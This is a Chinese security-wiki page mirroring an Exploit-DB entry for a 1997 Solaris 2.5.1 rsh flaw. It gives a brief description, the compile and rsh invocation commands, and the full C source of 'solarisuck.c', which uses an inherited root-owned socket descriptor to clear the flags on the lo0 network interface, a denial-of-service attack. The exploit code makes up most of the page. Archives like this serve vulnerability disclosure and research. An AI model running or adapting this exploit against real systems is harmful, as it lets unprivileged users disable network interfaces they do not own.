Solaris 2.5.1 – rsh socket Descriptor

Solaris 2.5.1 – rsh socket Descriptor

漏洞ID 1053352 漏洞类型
发布时间 1997-06-19 更新时间 1997-06-19
图片[1]-Solaris 2.5.1 – rsh socket Descriptor-安全小百科CVE编号 N/A
图片[2]-Solaris 2.5.1 – rsh socket Descriptor-安全小百科CNNVD-ID N/A
漏洞平台 Solaris CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19343
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/453/info


A vulnerability in rsh exists that can allow a regular user to modify a root owned socket descriptor. The consequences of this are a possible denial of service due to interfaces being manipulated by malicious users. 


cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck

------------
solarisuck.c
------------
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <net/if.h>
#include <netinet/in.h>


int main(int argc, char *argv[])
{
struct ifreq please_break_me;

strcpy( please_break_me.ifr_name, "lo0");
please_break_me.ifr_flags=0;

if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1)
perror("Damn it didnt work. Obviously not Solaris ;)");
}

相关推荐: .reg文件注册表漏洞

.reg文件注册表漏洞 漏洞ID 1207600 漏洞类型 未知 发布时间 1997-01-01 更新时间 1997-01-01 CVE编号 CVE-1999-0572 CNNVD-ID CNNVD-199701-014 漏洞平台 N/A CVSS评分 9.3…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享